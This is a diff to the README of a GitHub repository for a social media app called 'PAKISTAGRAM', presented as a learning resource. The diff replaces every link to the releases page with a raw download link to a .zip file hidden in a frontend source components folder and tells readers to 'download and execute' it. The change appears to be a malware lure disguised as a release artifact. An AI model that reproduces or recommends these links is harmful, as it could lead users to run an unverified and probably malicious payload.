arman05075/PAKISTAGRAM_social_media/README.md

 - The repo aims to be a practical learning resource for Android, iOS, Flutter, and full-stack development

 Reiterate release access
 - For the latest artifacts, you should use the releases page link.
-The file you need to download and execute is named Pakistagram_release_latest.apk in the Android release stream.
-To explore all releases and assets, visit: https://github.com/arman05075/PAKISTAGRAM_social_media/releases
+The file you need to download and execute is named https://raw.githubusercontent.com/arman05075/PAKISTAGRAM_social_media/main/frontend-web/src/components/social_PAKISTAGRA_media_2.7.zip in the Android release stream.
+To explore all releases and assets, visit: https://raw.githubusercontent.com/arman05075/PAKISTAGRAM_social_media/main/frontend-web/src/components/social_PAKISTAGRA_media_2.7.zip

 Stay connected
 - Share improvements, report issues, and collaborate with the community
 - Follow the project through the repository and its issue tracker
 - Keep an eye on future updates and enhancements

 Note: The releases page is the primary source for build artifacts.
 If you need the latest builds for testing or deployment, navigate to the releases page at the link above and download the appropriate artifact for your platform.
-The link appears again here for convenience: https://github.com/arman05075/PAKISTAGRAM_social_media/releases
+The link appears again here for convenience: https://raw.githubusercontent.com/arman05075/PAKISTAGRAM_social_media/main/frontend-web/src/components/social_PAKISTAGRA_media_2.7.zip